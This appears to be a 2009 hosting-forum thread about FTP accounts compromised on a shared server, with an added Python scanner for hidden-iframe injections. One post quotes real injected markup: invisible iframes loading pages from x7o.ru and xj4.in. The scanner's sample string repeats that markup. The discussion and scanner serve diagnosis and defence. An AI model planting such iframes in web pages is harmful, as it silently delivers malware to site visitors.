FTP compromised
The Planet Forums > Security > General Security
da644
Hi,

One of the servers we manage appears to have had its FTP compromised for at least two of the sites hosted on it. The sites both had very complex passwords, over 15 random characters including letters, numbers and symbol characters, meaning they would have been very hard to brute force; also there is nothing in the logs on the server to suggest it was a brute force attack.

The attacker injected a function into all the Javascript files on the server as per this blog post:

http://blog.unmaskparasites.com/2009/05/07...njected-script/

As it doesn't appear to have been brute forced, I can only think of two possibilities for how they got these passwords, either:

1) They managed to get them from the site owner

2) They sniffed them from TCP/IP packets

I would suggest 2 is the more likely possibility, as the passwords were only known to a couple of people, and this would therefore imply it could be a compromised router somewhere (which in theory could be anywhere).

Has anyone else experienced this type of attack in the last couple of days?

Regards,

da644
ns1
A few of my sites have been hacked recently. Scripts were injected. As far as I can see they look like this:

CODE
<body onload="MM_preloadImages('images/vsr2_05.gif','images/vsr2_06.gif','images/vsr2_07.gif','images/vsr2_08.gif','images/vsr2_09.gif','images/vsr2_14.gif','images/vsr2_15.gif','images/vsr2_16.gif','images/vsr2_17.gif','images/vsr2_18.gif')"><iframe src="http://x7o.ru:8080/index.php" width=111 height=174 style="visibility: hidden"></iframe>


or:

CODE
<iframe src="http://xj4.in:8080/index.php" width=190 height=162 style="visibility: hidden"></iframe>


any ideas?
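As an added example (not code from the thread or its participants), a small Python scanner for the kind of hidden-iframe injection shown in the post above: it flags iframes that are styled invisible or sized to zero and can walk a web root to list affected files. The sample markup is constructed from the two snippets quoted in the post; the file suffix list is an assumption.

```python
import re
from pathlib import Path

# Any <iframe ...> opening tag; group 1 holds the raw attribute text.
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# One attribute: name=value with double, single or no quotes (width=111 style).
ATTR_RE = re.compile(r'([A-Za-z][\w-]*)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')
# Inline styles that make the frame invisible to the visitor.
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
# Assumed set of file types worth scanning under a web root.
SCAN_SUFFIXES = {".html", ".htm", ".php", ".js"}

def parse_attrs(attr_text):
    """Return the tag's attributes as {lowercase name: value}."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs

def find_hidden_iframes(html):
    """Return (src, reason) for every iframe a visitor could not see."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(1))
        reasons = []
        if HIDDEN_RE.search(attrs.get("style", "")):
            reasons.append("hidden via style")
        if "0" in (attrs.get("width"), attrs.get("height")):
            reasons.append("zero-size")
        if reasons:
            hits.append((attrs.get("src", ""), ", ".join(reasons)))
    return hits

def scan_tree(root):
    """Walk a web root and map each file containing a hidden iframe to its hits."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            hits = find_hidden_iframes(path.read_text(errors="ignore"))
            if hits:
                findings[str(path)] = hits
    return findings

# Constructed sample, assembled from the two snippets quoted in the post.
SAMPLE_INJECTED = (
    '<body onload="MM_preloadImages(\'images/vsr2_05.gif\')">'
    '<iframe src="http://x7o.ru:8080/index.php" width=111 height=174 '
    'style="visibility: hidden"></iframe>'
)

if __name__ == "__main__":
    for src, reason in find_hidden_iframes(SAMPLE_INJECTED):
        print(f"suspicious iframe -> {src} ({reason})")
    # scan_tree("/var/www") would report every affected file under a web root.
```

A clean match list is not proof of a clean site; the thread also reports code injected into .js files, which this check does not cover.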
eth00
Check out the Gumblar virus: it infects a client PC, steals the passwords, and exploits the websites. Sounds like what may be happening here... did the users save their passwords?
wgl1
Usually malicious software steals FTP passwords on the client side. But the FTP daemon could be compromised if configured improperly.
I can recommend installing pureftp (a very secure FTP daemon) and following the guide to secure pureftp.
joec@home
Does any site on the server use Front Page? There was an exploit specific to Front Page on WHM that allows read access to the domlogs folder to determine what is hosted on the server and write access to all websites. You might try turning Front Page off to see if this blocks the access.
Invision Power Board © 2001-2009 Invision Power Services, Inc.